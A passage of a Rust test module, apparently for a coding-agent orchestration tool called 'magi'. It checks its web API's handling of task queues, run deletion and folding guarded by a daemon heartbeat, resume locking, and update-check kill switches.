7845 let (addr, warning) = resolve_bind(&Bind::Auto);
7846
7847 match addr {
7854 IpAddr::V4(ip) if is_tailnet(&ip) => {
7855 assert!(warning.is_none(), "a tailnet address needs no warning");
7856 }
7857 other => {
7858 assert_eq!(other, IpAddr::V4(Ipv4Addr::LOCALHOST));
7859 let warning = warning.expect("a fallback has to explain itself");
7860 assert!(
7861 warning.contains("127.0.0.1") && warning.contains("local-only"),
7862 "the warning says what happened and what it costs: {warning}"
7863 );
7864 }
7865 }
7866 }
7867
7868 #[test]
7869 fn only_the_cgnat_block_counts_as_a_tailnet_address() {
7870 assert!(is_tailnet(&Ipv4Addr::new(100, 64, 0, 1)));
7874 assert!(is_tailnet(&Ipv4Addr::new(100, 127, 255, 254)));
7875 assert!(!is_tailnet(&Ipv4Addr::new(100, 63, 255, 255)));
7876 assert!(!is_tailnet(&Ipv4Addr::new(100, 128, 0, 1)));
7877 assert!(!is_tailnet(&Ipv4Addr::new(127, 0, 0, 1)));
7878 }
7879
7880 #[test]
7881 fn an_ambiguous_prefix_is_a_bad_request_and_a_missing_one_is_not_found() {
7882 let ids = vec![
7883 "20260902-140501-aaaa".to_owned(),
7884 "20260902-140502-aabb".to_owned(),
7885 ];
7886
7887 let missing = pick(ids.clone(), "zzzz", "run").expect_err("no match");
7888 let ambiguous = pick(ids.clone(), "202609", "run").expect_err("two matches");
7889 let short = pick(ids, "aabb", "run").expect("the short id is the tail of an id");
7890
7891 assert_eq!(missing.status, StatusCode::NOT_FOUND);
7892 assert_eq!(ambiguous.status, StatusCode::BAD_REQUEST);
7893 assert_eq!(short, "20260902-140502-aabb");
7894 }
7895 #[tokio::test]
7896 async fn a_panel_reaches_its_assets_by_the_bare_name_it_was_told_to_use() {
7897 let fx = Fixture::start().await;
7903 let id = panel(
7904 &fx,
7905 "<img src=\"shot.png\">",
7906 &[("shot.png", b"\x89PNG\r\n\x1a\n")],
7907 );
7908
7909 let doc = fx
7911 .get(&format!("/api/questions/{id}/panel/index.html"))
7912 .await;
7913 assert_eq!(doc.status, 200, "{}", doc.body);
7914 assert_eq!(doc.header("content-type"), Some("text/html; charset=utf-8"));
7915
7916 let sibling = fx.get(&format!("/api/questions/{id}/panel/shot.png")).await;
7917 assert_eq!(sibling.status, 200, "{}", sibling.body);
7918 assert_eq!(sibling.header("content-type"), Some("image/png"));
7919 assert_eq!(
7920 sibling.header("content-security-policy"),
7921 Some(PANEL_CSP),
7922 "the sibling route must carry the same policy as the asset route"
7923 );
7924
7925 assert_eq!(
7928 fx.head(&format!("/api/questions/{id}/panel")).await.status,
7929 200
7930 );
7931 }
7932
7933 #[test]
7934 fn runs_revision_moves_when_deleting_an_older_run() {
7935 let temp = TempDir::new().expect("tempdir");
7936 let runs = temp.path().join("runs");
7937 std::fs::create_dir_all(&runs).expect("create runs dir");
7938
7939 assert_eq!(runs_revision(&runs), 0, "empty runs has 0 revision");
7940
7941 write_run(&runs, "20260901-100000-old1", RunStatus::Merged);
7942 std::thread::sleep(Duration::from_millis(10));
7943 write_run(&runs, "20260902-100000-new2", RunStatus::Merged);
7944
7945 let rev_before = runs_revision(&runs);
7946 assert!(rev_before > 0);
7947
7948 let old_dir = runs.join("20260901-100000-old1");
7949 std::fs::remove_dir_all(&old_dir).expect("remove old run");
7950
7951 let rev_after = runs_revision(&runs);
7952 assert_ne!(
7953 rev_before, rev_after,
7954 "deleting an older run must change the revision so other clients see the deletion"
7955 );
7956 }
7957
7958 fn write_state(runs: &FsPath, state: &RunState) {
7963 let dir = runs.join(&state.id);
7964 std::fs::create_dir_all(&dir).expect("run dir");
7965 std::fs::write(
7966 dir.join("run.json"),
7967 serde_json::to_string_pretty(state).expect("serialize run"),
7968 )
7969 .expect("write run.json");
7970 }
7971
7972 #[test]
7977 fn runs_revision_moves_when_a_seat_starts_and_again_when_it_finishes() {
7978 let temp = TempDir::new().expect("tempdir");
7979 let runs = temp.path().join("runs");
7980 std::fs::create_dir_all(&runs).expect("create runs dir");
7981 let mut state = RunState::new(
7982 PathBuf::from("/repo/magi"),
7983 "main".to_owned(),
7984 "0123456789abcdef".to_owned(),
7985 "task".to_owned(),
7986 Config::default(),
7987 );
7988 state.id = "20260902-100000-c0de".to_owned();
7989 write_state(&runs, &state);
7990
7991 let rev_idle = runs_revision(&runs);
7992 std::thread::sleep(Duration::from_millis(10));
7993 state.seat_started("judge", "judge-1", std::time::Duration::from_secs(60), 0);
7994 write_state(&runs, &state);
7995 let rev_started = runs_revision(&runs);
7996 assert_ne!(
7997 rev_idle, rev_started,
7998 "a seat starting must move the revision"
7999 );
8000
8001 std::thread::sleep(Duration::from_millis(10));
8002 state.seat_finished("judge-1");
8003 write_state(&runs, &state);
8004 let rev_finished = runs_revision(&runs);
8005 assert_ne!(
8006 rev_started, rev_finished,
8007 "and clearing it again must move the revision a second time"
8008 );
8009 }
8010
8011 #[tokio::test]
8012 async fn queue_json_carries_dependency_fields_and_a_hold_clears_them() {
8013 let fx = Fixture::start().await;
8018 let q = fx.queue();
8019
8020 let mut t = Task::new(
8021 "Task".to_owned(),
8022 "Instruction".to_owned(),
8023 PathBuf::from("/repo"),
8024 Source::Human,
8025 );
8026 t.block(
8027 vec!["20260101-000000-dead".to_owned()],
8028 Some("waiting on Task 1".to_owned()),
8029 );
8030 t.answers.push(crate::queue::AnsweredQuestion {
8031 question: "Which backend?".to_owned(),
8032 answer: "SQLite".to_owned(),
8033 });
8034 q.put(&mut t).expect("put t");
8035
8036 let res = fx.get("/api/queue").await;
8037 assert_eq!(res.status, 200);
8038 let list = res.json();
8039 let view = list
8040 .as_array()
8041 .expect("array")
8042 .iter()
8043 .find(|v| v["id"] == t.id)
8044 .expect("task in list");
8045 assert_eq!(view["status_str"], "blocked");
8046 assert_eq!(
8047 view["blocked_by"],
8048 serde_json::json!(["20260101-000000-dead"])
8049 );
8050 assert_eq!(view["block_reason"], "waiting on Task 1");
8051 assert_eq!(view["answers"][0]["question"], "Which backend?");
8052 assert_eq!(view["answers"][0]["answer"], "SQLite");
8053
8054 let res = fx
8058 .post(&format!("/api/queue/{}/hold", t.short()), None)
8059 .await;
8060 assert_eq!(res.status, 200);
8061 let held = res.json();
8062 assert_eq!(held["status_str"], "held");
8063 assert_eq!(held["blocked_by"], serde_json::json!([]));
8064 assert!(held["block_reason"].is_null());
8065 assert_eq!(held["answers"][0]["answer"], "SQLite");
8066 }
8067
8068 #[tokio::test]
8069 async fn queue_json_shows_a_blocked_chain_and_its_stuck_root() {
8070 let fx = Fixture::start().await;
8071 let q = fx.queue();
8072 let mk = |title: &str| {
8073 Task::new(
8074 title.to_owned(),
8075 "Instruction".to_owned(),
8076 PathBuf::from("/repo"),
8077 Source::Human,
8078 )
8079 };
8080 let mut root = mk("root");
8081 root.hold_manual(Some("waiting".to_owned()));
8082 q.put(&mut root).unwrap();
8083 let mut mid = mk("mid");
8084 mid.block(vec![root.id.clone()], None);
8085 q.put(&mut mid).unwrap();
8086 let mut leaf = mk("leaf");
8087 leaf.block(vec![mid.id.clone()], None);
8088 q.put(&mut leaf).unwrap();
8089
8090 let list = fx.get("/api/queue").await.json();
8091 let find = |id: &str| {
8092 list.as_array()
8093 .unwrap()
8094 .iter()
8095 .find(|v| v["id"] == id)
8096 .unwrap()
8097 .clone()
8098 };
8099 let leaf_view = find(&leaf.id);
8100 assert_eq!(
8101 leaf_view["waits_on"],
8102 serde_json::json!([format!("{} (blocked → {} held)", mid.short(), root.short())])
8103 );
8104 assert_eq!(leaf_view["stuck_roots"], serde_json::json!([root.short()]));
8105 assert_eq!(
8106 find(&mid.id)["waits_on"],
8107 serde_json::json!([format!("{} (held)", root.short())])
8108 );
8109 assert_eq!(find(&root.id)["waits_on"], serde_json::json!([]));
8110 }
8111
8112 #[tokio::test]
8113 async fn delete_queue_task_deletes_file_and_guards_running_and_locked() {
8114 let fx = Fixture::start().await;
8115 let q = fx.queue();
8116
8117 let mut t1 = Task::new(
8119 "Task 1".to_owned(),
8120 "Instruction 1".to_owned(),
8121 PathBuf::from("/repo"),
8122 Source::Human,
8123 );
8124 let run_id = "20260901-000000-r111";
8125 t1.runs.push(run_id.to_owned());
8126 write_run(&fx.runs(), run_id, RunStatus::Merged);
8127 q.put(&mut t1).expect("put t1");
8128
8129 let res = fx.delete(&format!("/api/queue/{}", t1.short())).await;
8131 assert_eq!(res.status, 204);
8132 assert!(res.body.is_empty(), "204 No Content has no body");
8133 assert!(!q.path_of(&t1.id).exists(), "task file is deleted");
8134 assert!(
8135 fx.runs().join(run_id).exists(),
8136 "run directory must not be deleted when its task is deleted"
8137 );
8138
8139 let mut t2 = Task::new(
8141 "Task 2".to_owned(),
8142 "Instruction 2".to_owned(),
8143 PathBuf::from("/repo"),
8144 Source::Human,
8145 );
8146 t2.status = TaskStatus::Running;
8147 q.put(&mut t2).expect("put t2");
8148 let mut beat = crate::daemon::Status::new();
8149 beat.current = vec![crate::daemon::Current {
8150 task: t2.id.clone(),
8151 run: "20260901-000000-r222".to_owned(),
8152 }];
8153 beat.updated_at = jiff::Timestamp::now();
8154 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8155 .expect("publish a heartbeat");
8156 let res = fx.delete(&format!("/api/queue/{}", t2.id)).await;
8157 assert_eq!(res.status, 409);
8158 assert!(
8159 res.json()["error"]
8160 .as_str()
8161 .unwrap()
8162 .contains("live daemon")
8163 );
8164 assert!(q.path_of(&t2.id).exists(), "a task in flight is kept");
8165
8166 beat.updated_at = jiff::Timestamp::now() - jiff::SignedDuration::from_secs(600);
8172 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8173 .expect("leave a stale heartbeat");
8174 let mut t3 = Task::new(
8175 "Task 3".to_owned(),
8176 "Instruction 3".to_owned(),
8177 PathBuf::from("/repo"),
8178 Source::Human,
8179 );
8180 t3.status = TaskStatus::Running;
8181 q.put(&mut t3).expect("put t3");
8182 std::mem::forget(q.claim(&t3.id).expect("claim t3"));
8183 let res = fx.delete(&format!("/api/queue/{}", t3.id)).await;
8184 assert_eq!(res.status, 204);
8185 assert!(!q.path_of(&t3.id).exists(), "the task file is gone");
8186 assert!(
8187 q.claim(&t3.id).is_ok(),
8188 "the stale lock went with it, so the id is claimable again"
8189 );
8190
8191 let res = fx.delete("/api/queue/nonexistent").await;
8193 assert_eq!(res.status, 404);
8194 }
8195
8196 #[tokio::test]
8197 async fn delete_run_deletes_directory_and_guards_running_and_unfolded() {
8198 let fx = Fixture::start().await;
8199 let runs = fx.runs();
8200
8201 let run_id = "20260901-000000-fold";
8203 let mut state = RunState::new(
8204 PathBuf::from("/repo"),
8205 "main".to_owned(),
8206 "abc".to_owned(),
8207 "instruction".to_owned(),
8208 Config::default(),
8209 );
8210 state.id = run_id.to_owned();
8211 state.status = RunStatus::Merged;
8212 state.candidates.push(crate::run::Candidate {
8213 index: 0,
8214 label: 'A',
8215 agent: "a".to_owned(),
8216 branch: "b".to_owned(),
8217 worktree: PathBuf::from("/w"),
8218 summary: String::new(),
8219 stat: String::new(),
8220 files: 1,
8221 commits: 1,
8222 empty: false,
8223 failed: None,
8224 verified_noop: None,
8225 duration_ms: 0,
8226 folded: true,
8227 });
8228 let dir = runs.join(run_id);
8229 std::fs::create_dir_all(dir.join("artifacts")).expect("create artifacts");
8230 std::fs::write(dir.join("artifacts").join("patch.diff"), "dummy diff")
8231 .expect("write artifact");
8232 std::fs::write(dir.join("run.json"), serde_json::to_string(&state).unwrap())
8233 .expect("write run.json");
8234
8235 let res = fx.delete(&format!("/api/runs/{}", state.short())).await;
8237 assert_eq!(res.status, 204);
8238 assert!(res.body.is_empty(), "204 has no body");
8239 assert!(!dir.exists(), "run directory and artifacts must be deleted");
8240
8241 let run_running = "20260901-000000-rung";
8246 write_run(&runs, run_running, RunStatus::Prep);
8247 let mut beat = crate::daemon::Status::new();
8248 beat.current = vec![crate::daemon::Current {
8249 task: "20260901-000000-task".to_owned(),
8250 run: run_running.to_owned(),
8251 }];
8252 beat.updated_at = jiff::Timestamp::now();
8253 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8254 .expect("publish a heartbeat");
8255 let res = fx.delete(&format!("/api/runs/{run_running}")).await;
8256 assert_eq!(res.status, 409);
8257 assert!(
8258 res.json()["error"]
8259 .as_str()
8260 .unwrap()
8261 .contains("live daemon"),
8262 "the refusal must say who is holding it"
8263 );
8264 assert!(
8265 runs.join(run_running).exists(),
8266 "a run in flight keeps its directory"
8267 );
8268
8269 let run_unfolded = "20260901-000000-unfd";
8271 let mut state2 = RunState::new(
8272 PathBuf::from("/repo"),
8273 "main".to_owned(),
8274 "abc".to_owned(),
8275 "instruction".to_owned(),
8276 Config::default(),
8277 );
8278 state2.id = run_unfolded.to_owned();
8279 state2.status = RunStatus::Ready;
8280 state2.candidates.push(crate::run::Candidate {
8281 index: 0,
8282 label: 'A',
8283 agent: "a".to_owned(),
8284 branch: "b".to_owned(),
8285 worktree: PathBuf::from("/w"),
8286 summary: String::new(),
8287 stat: String::new(),
8288 files: 1,
8289 commits: 1,
8290 empty: false,
8291 failed: None,
8292 verified_noop: None,
8293 duration_ms: 0,
8294 folded: false,
8295 });
8296 let dir2 = runs.join(run_unfolded);
8297 std::fs::create_dir_all(&dir2).expect("create dir2");
8298 std::fs::write(
8299 dir2.join("run.json"),
8300 serde_json::to_string(&state2).unwrap(),
8301 )
8302 .expect("write run.json");
8303
8304 let res = fx.delete(&format!("/api/runs/{run_unfolded}")).await;
8305 assert_eq!(res.status, 409);
8306 assert!(res.json()["error"].as_str().unwrap().contains("magi fold"));
8307 assert!(dir2.exists(), "unfolded run directory is kept");
8308
8309 let res = fx.delete("/api/runs/nonexistent").await;
8311 assert_eq!(res.status, 404);
8312 }
8313
8314 #[test]
8315 fn web_ui_delete_contract_in_front_end() {
8316 assert!(APP_JS.contains("deleteRun:"));
8318 assert!(APP_JS.contains("deleteTask:"));
8319
8320 let run_cards_slice = &APP_JS[APP_JS.find("function createRunCard").unwrap()
8322 ..APP_JS.find("function renderRuns").unwrap()];
8323 assert!(!run_cards_slice.to_lowercase().contains("delete"));
8324
8325 assert!(APP_JS.contains("renderRunDelete"));
8327 assert!(APP_JS.contains("runDeleteReason"));
8328 assert!(APP_JS.contains("magi fold"));
8329 assert!(APP_JS.contains("This run is still in flight and cannot be deleted."));
8330
8331 assert!(APP_JS.contains("cancel.focus"));
8333 assert!(APP_JS.contains("armedRunDelete"));
8334 assert!(APP_JS.contains("armedDelete"));
8335
8336 assert!(APP_JS.contains("disabled: status === \"running\""));
8338 }
8339
8340 #[test]
8360 fn every_ref_a_run_card_uses_is_one_its_builder_published() {
8361 let build = APP_JS
8362 .find("function createRunCard")
8363 .expect("createRunCard exists");
8364 let update = APP_JS
8365 .find("function updateRunCard")
8366 .expect("updateRunCard exists");
8367 let end = APP_JS
8368 .find("function renderRuns")
8369 .expect("renderRuns exists");
8370
8371 let builder = &APP_JS[build..update];
8373 let open = builder.find("refs = {").expect("createRunCard sets refs");
8374 let literal = &builder[open + "refs = {".len()..];
8375 let close = literal.find('}').expect("the refs literal is closed");
8376 let published: HashSet<&str> = literal[..close]
8377 .split(',')
8378 .filter_map(|entry| entry.split(':').next())
8380 .map(str::trim)
8381 .filter(|name| !name.is_empty())
8382 .collect();
8383 assert!(
8384 published.len() > 5,
8385 "the refs literal did not parse into names: {published:?}"
8386 );
8387
8388 let mut used: Vec<&str> = Vec::new();
8391 let updaters = &APP_JS[update..end];
8392 for (at, _) in updaters.match_indices("r.") {
8393 let before = updaters[..at].chars().next_back();
8396 if before.is_some_and(|c| c.is_alphanumeric() || c == '_' || c == '$' || c == '.') {
8397 continue;
8398 }
8399 let rest = &updaters[at + 2..];
8400 let len = rest
8401 .find(|c: char| !(c.is_alphanumeric() || c == '_' || c == '$'))
8402 .unwrap_or(rest.len());
8403 if len > 0 {
8404 used.push(&rest[..len]);
8405 }
8406 }
8407 assert!(
8408 used.len() > 5,
8409 "no `r.<name>` uses were found; the updaters must have been rewritten: {used:?}"
8410 );
8411
8412 let missing: Vec<&str> = used
8413 .iter()
8414 .copied()
8415 .filter(|name| !published.contains(name))
8416 .collect();
8417 assert!(
8418 missing.is_empty(),
8419 "a run card's updater reaches for {missing:?}, which `createRunCard` \
8420 never put in `refs` - every card will throw and the list will \
8421 render empty under a count line that says otherwise. Published: \
8422 {published:?}"
8423 );
8424 }
8425
8426 #[tokio::test]
8427 async fn folding_from_the_phone_reports_what_it_removed() {
8428 let fx = Fixture::start().await;
8429 let runs = fx.runs();
8430
8431 let id = "20260901-000000-fold";
8435 write_run(&runs, id, RunStatus::Stalled);
8436 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8437 assert_eq!(res.status, 200);
8438 assert_eq!(res.json()["removed_count"], 0);
8439 assert_eq!(res.json()["run"], id);
8440 assert!(
8441 runs.join(id).exists(),
8442 "a fold keeps the run's record; only the worktrees go"
8443 );
8444 }
8445
8446 #[tokio::test]
8447 async fn folding_an_unreadable_run_falls_back_to_removing_it_wholesale() {
8448 let fx = Fixture::start().await;
8449 let runs = fx.runs();
8450 let wt = fx.home.path().join("wt").join("magi").join("dead");
8451 let id = "20260901-000000-dead";
8452 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8453 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8454 std::fs::create_dir_all(&wt).expect("worktree dir");
8455
8456 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8457 assert_eq!(res.status, 200, "{}", res.body);
8458 assert!(
8459 res.json()["removed_count"].as_u64().unwrap() > 0,
8460 "the worktree this build could not read a state for still went"
8461 );
8462 assert!(
8463 !runs.join(id).exists(),
8464 "an unreadable run has no candidate list to fold selectively, so \
8465 the whole record goes - same as `magi fold` on the CLI"
8466 );
8467 }
8468
8469 #[tokio::test]
8470 async fn deleting_an_unreadable_run_removes_it_wholesale() {
8471 let fx = Fixture::start().await;
8472 let runs = fx.runs();
8473 let wt = fx.home.path().join("wt").join("magi").join("gone");
8474 let id = "20260901-000000-gone";
8475 std::fs::create_dir_all(runs.join(id)).expect("run dir");
8476 std::fs::write(runs.join(id).join("run.json"), "not json").expect("garbage state");
8477 std::fs::create_dir_all(&wt).expect("worktree dir");
8478
8479 let res = fx.delete(&format!("/api/runs/{id}")).await;
8480 assert_eq!(res.status, 204, "{}", res.body);
8481 assert!(!runs.join(id).exists(), "the broken record is gone");
8482 assert!(!wt.exists(), "its worktree is gone too");
8483 }
8484
8485 #[tokio::test]
8486 async fn folding_is_refused_while_a_daemon_is_working_on_the_run() {
8487 let fx = Fixture::start().await;
8488 let runs = fx.runs();
8489 let id = "20260901-000000-live";
8490 write_run(&runs, id, RunStatus::Implementing);
8491
8492 let mut beat = crate::daemon::Status::new();
8493 beat.current = vec![crate::daemon::Current {
8494 task: "20260901-000000-task".to_owned(),
8495 run: id.to_owned(),
8496 }];
8497 beat.updated_at = jiff::Timestamp::now();
8498 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8499 .expect("publish a heartbeat");
8500
8501 let res = fx.post(&format!("/api/runs/{id}/fold"), None).await;
8502 assert_eq!(res.status, 409);
8503 assert!(
8504 res.json()["error"]
8505 .as_str()
8506 .unwrap()
8507 .contains("live daemon"),
8508 "folding under a running agent would pull its worktree away"
8509 );
8510 }
8511
8512 #[tokio::test]
8513 async fn fold_merged_requires_a_pr_url() {
8514 let fx = Fixture::start().await;
8515 let runs = fx.runs();
8516 let id = "20260901-000000-nourl";
8517 write_run(&runs, id, RunStatus::Blocked);
8518
8519 let res = fx
8520 .post(&format!("/api/runs/{id}/fold-merged"), Some("{}"))
8521 .await;
8522 assert_eq!(res.status, 400, "{}", res.body);
8523
8524 let blank = fx
8525 .post(
8526 &format!("/api/runs/{id}/fold-merged"),
8527 Some(r#"{"pr_url":" "}"#),
8528 )
8529 .await;
8530 assert_eq!(blank.status, 400, "{}", blank.body);
8531 }
8532
8533 #[tokio::test]
8534 async fn fold_merged_is_404_for_an_unknown_run() {
8535 let fx = Fixture::start().await;
8536 let res = fx
8537 .post(
8538 "/api/runs/nosuchrun/fold-merged",
8539 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8540 )
8541 .await;
8542 assert_eq!(res.status, 404, "{}", res.body);
8543 }
8544
8545 #[tokio::test]
8546 async fn fold_merged_is_refused_while_a_daemon_is_working_on_the_run() {
8547 let fx = Fixture::start().await;
8548 let runs = fx.runs();
8549 let id = "20260901-000000-livemerge";
8550 write_run(&runs, id, RunStatus::Blocked);
8551
8552 let mut beat = crate::daemon::Status::new();
8553 beat.current = vec![crate::daemon::Current {
8554 task: "20260901-000000-task".to_owned(),
8555 run: id.to_owned(),
8556 }];
8557 beat.updated_at = jiff::Timestamp::now();
8558 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8559 .expect("publish a heartbeat");
8560
8561 let res = fx
8562 .post(
8563 &format!("/api/runs/{id}/fold-merged"),
8564 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8565 )
8566 .await;
8567 assert_eq!(res.status, 409, "{}", res.body);
8568 assert!(
8569 res.json()["error"]
8570 .as_str()
8571 .unwrap()
8572 .contains("live daemon"),
8573 "correcting a run's merge underneath a running agent would race \
8574 whatever it is doing to the same `status`/`merge` fields"
8575 );
8576 }
8577
8578 #[tokio::test]
8583 async fn fold_merged_refuses_a_pull_request_it_cannot_confirm_is_merged() {
8584 let fx = Fixture::start().await;
8585 let runs = fx.runs();
8586 let id = "20260901-000000-unconfirmed";
8587 write_run(&runs, id, RunStatus::Blocked);
8588
8589 let res = fx
8590 .post(
8591 &format!("/api/runs/{id}/fold-merged"),
8592 Some(r#"{"pr_url":"https://github.com/owner/repo/pull/1"}"#),
8593 )
8594 .await;
8595 assert_eq!(res.status, 400, "{}", res.body);
8596 assert_eq!(
8597 read_run(&runs, id).unwrap().status,
8598 RunStatus::Blocked,
8599 "a pull request that could not be confirmed merged must leave \
8600 the run exactly where it was"
8601 );
8602 }
8603
8604 #[tokio::test]
8605 async fn resume_is_refused_unless_the_run_stopped_somewhere_it_can_continue() {
8606 let fx = Fixture::start().await;
8607 let runs = fx.runs();
8608
8609 for (status, word) in [
8615 (RunStatus::Merged, "merged"),
8616 (RunStatus::Ready, "ready"),
8617 (RunStatus::Failed, "failed"),
8618 ] {
8619 let id = format!("20260901-000000-{}", &word[..4]);
8620 write_run(&runs, &id, status);
8621 let res = fx.post(&format!("/api/runs/{id}/resume"), None).await;
8622 assert_eq!(res.status, 409, "{word} must not be resumable");
8623 let err = res.json()["error"].as_str().unwrap().to_owned();
8624 assert!(err.contains(word), "the refusal names the status: {err}");
8625 }
8626
8627 let mid = "20260901-000000-midf";
8632 write_run(&runs, mid, RunStatus::Reviewing);
8633 let res = fx.post(&format!("/api/runs/{mid}/resume"), None).await;
8634 assert_eq!(res.status, 202, "an interrupted run is resumable");
8635 }
8636
8637 #[tokio::test]
8638 async fn resume_is_refused_while_the_loop_is_running() {
8639 let fx = Fixture::start().await;
8640 let runs = fx.runs();
8641 let stalled = "20260901-000000-stal";
8642 write_run(&runs, stalled, RunStatus::Stalled);
8643
8644 let mut beat = crate::daemon::Status::new();
8648 beat.current = vec![crate::daemon::Current {
8649 task: "20260901-000000-task".to_owned(),
8650 run: "20260901-000000-othr".to_owned(),
8651 }];
8652 beat.updated_at = jiff::Timestamp::now();
8653 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8654 .expect("publish a heartbeat");
8655
8656 let res = fx.post(&format!("/api/runs/{stalled}/resume"), None).await;
8657 assert_eq!(res.status, 409);
8658 let err = res.json()["error"].as_str().unwrap().to_owned();
8659 assert!(err.contains("othr"), "it names what the loop is on: {err}");
8660 assert!(err.contains("stop it first"), "{err}");
8661 }
8662
8663 #[test]
8664 fn a_run_cannot_be_resumed_twice_at_once() {
8665 let home = TempDir::new().expect("temp home");
8666 let ui = Ui::new(
8667 Queue::at(home.path().join("queue")),
8668 Questions::at(home.path().join("questions")),
8669 Talks::at(home.path().join("talks")),
8670 home.path().join("runs"),
8671 home.path().to_path_buf(),
8672 PathBuf::from("/repo"),
8673 )
8674 .with_worktrees_root(home.path().join("wt"));
8675 let first = ui.begin_resume("20260901-000000-once").expect("claimed");
8676 let again = ui.begin_resume("20260901-000000-once");
8677 assert!(again.is_err(), "a second tap must not start a second graph");
8678 drop(first);
8679 assert!(
8680 ui.begin_resume("20260901-000000-once").is_ok(),
8681 "and the claim is released when the attempt ends"
8682 );
8683 }
8684
8685 #[test]
8686 fn talk_thinking_tracks_only_its_held_turn_claim() {
8687 let home = TempDir::new().expect("temp home");
8688 let ui = Ui::new(
8689 Queue::at(home.path().join("queue")),
8690 Questions::at(home.path().join("questions")),
8691 Talks::at(home.path().join("talks")),
8692 home.path().join("runs"),
8693 home.path().to_path_buf(),
8694 PathBuf::from("/repo"),
8695 )
8696 .with_worktrees_root(home.path().join("wt"));
8697 let id = "20260901-000000-once";
8698
8699 assert!(!ui.is_thinking(id), "an unclaimed talk is not thinking");
8700 let turn = ui.begin_talk_turn(id).expect("claim turn");
8701 assert!(ui.is_thinking(id), "the held guard is reported as thinking");
8702 assert!(
8703 !ui.is_thinking("20260901-000000-other"),
8704 "one talk's turn does not make another talk busy"
8705 );
8706 drop(turn);
8707 assert!(!ui.is_thinking(id), "dropping the guard releases thinking");
8708 }
8709
8710 #[tokio::test]
8711 async fn an_upgrade_is_refused_when_the_loop_belongs_to_another_process() {
8712 let fx = Fixture::start().await;
8713 let mut beat = crate::daemon::Status::new();
8717 beat.pid = 4321;
8718 beat.updated_at = jiff::Timestamp::now();
8719 crate::daemon::write_status_to(&fx.home.path().join("daemon.json"), &beat)
8720 .expect("publish a heartbeat");
8721
8722 let res = fx.post("/api/upgrade", None).await;
8723 assert_eq!(res.status, 409);
8724 let err = res.json()["error"].as_str().unwrap().to_owned();
8725 assert!(err.contains("4321"), "the refusal names the owner: {err}");
8726 assert!(err.contains("old one against the same queue"), "{err}");
8727 }
8728
8729 #[test]
8736 fn recheck_never_spawns_when_checking_is_off_or_killed_by_env() {
8737 assert!(!should_spawn_recheck(&crate::config::Update {
8738 mode: UpdateMode::Off,
8739 interval: None,
8740 }));
8741
8742 unsafe {
8745 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
8746 }
8747 let killed = should_spawn_recheck(&crate::config::Update {
8748 mode: UpdateMode::Notify,
8749 interval: None,
8750 });
8751 unsafe {
8752 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
8753 }
8754 assert!(
8755 !killed,
8756 "MAGI_NO_AUTOUPDATE must stop the periodic recheck, not just the \
8757 one-time startup check"
8758 );
8759
8760 assert!(should_spawn_recheck(&crate::config::Update {
8761 mode: UpdateMode::Notify,
8762 interval: None,
8763 }));
8764 }
8765
8766 #[test]
8772 fn recheck_poll_period_tracks_a_short_configured_interval() {
8773 let short = crate::config::Update {
8774 mode: UpdateMode::Notify,
8775 interval: Some("1m".to_owned()),
8776 };
8777 let period = recheck_poll_period(&short);
8778 assert!(
8779 period <= Duration::from_secs(30),
8780 "a one-minute interval must wake the task far sooner than the \
8781 default ceiling, or the deck would not notice within the \
8782 interval the operator configured: got {period:?}"
8783 );
8784
8785 let default = crate::config::Update {
8786 mode: UpdateMode::Notify,
8787 interval: None,
8788 };
8789 assert_eq!(
8790 recheck_poll_period(&default),
8791 UPDATE_RECHECK_POLL_MAX,
8792 "the default day-long interval should poll at the (capped) \
8793 ceiling rather than needlessly often"
8794 );
8795 }
8796
8797 #[test]
8805 fn recheck_skips_the_network_before_the_interval_elapses() {
8806 let dir = TempDir::new().expect("temp dir");
8807 let path = dir.path().join("state.json");
8808 let state = kaishin::UpdateCheckState {
8809 last_checked_unix: jiff::Timestamp::now().as_second() as u64,
8810 last_known_latest: None,
8811 last_known_url: None,
8812 };
8813 kaishin::save_check_state(&path, &state).expect("seed a just-checked state");
8814
8815 let checker = crate::updater::Checker::for_test(Duration::from_secs(24 * 60 * 60), path);
8816 assert!(
8817 !update_recheck_due(&checker, None),
8818 "a check made moments ago must not be repeated before the \
8819 configured interval elapses"
8820 );
8821 }
8822
8823 #[test]
8829 fn recheck_defers_to_an_upgrade_already_in_flight() {
8830 let dir = TempDir::new().expect("temp dir");
8831 let path = dir.path().join("state.json");
8832 let checker = crate::updater::Checker::for_test(Duration::from_secs(60 * 60), path);
8833 let progress = crate::updater::Progress::new("0.8.0".to_owned(), "v0.9.0".to_owned());
8834
8835 assert!(
8836 !update_recheck_due(&checker, Some(&progress)),
8837 "a recheck must not run while an upgrade this deck started is \
8838 still moving"
8839 );
8840 }
8841
8842 #[tokio::test]
8843 async fn an_upgrade_is_refused_by_the_no_autoupdate_kill_switch() {
8844 unsafe {
8856 std::env::set_var(crate::updater::NO_AUTOUPDATE_ENV, "1");
8857 }
8858 let fx = Fixture::start().await;
8859 let res = fx.post("/api/upgrade", None).await;
8860 unsafe {
8861 std::env::remove_var(crate::updater::NO_AUTOUPDATE_ENV);
8862 }
8863 assert_eq!(res.status, 200, "not 202: nothing was set in motion");
8864 let body = res.json();
8865 assert!(body["to"].is_null(), "there was no release to move to");
8866 assert!(body["parked"].is_null(), "and nothing was parked");
8867 assert!(
8868 body["detail"]
8869 .as_str()
8870 .unwrap()
8871 .contains("disabled by MAGI_NO_AUTOUPDATE"),
8872 "{body:?}"
8873 );
8874 }
8875
8876 #[tokio::test]
8877 async fn an_upgrade_with_nothing_to_install_changes_nothing() {
8878 let repo = TempDir::new().expect("repo dir");
8894 std::fs::write(repo.path().join("magi.toml"), "[update]\nmode = \"off\"\n")
8895 .expect("write magi.toml");
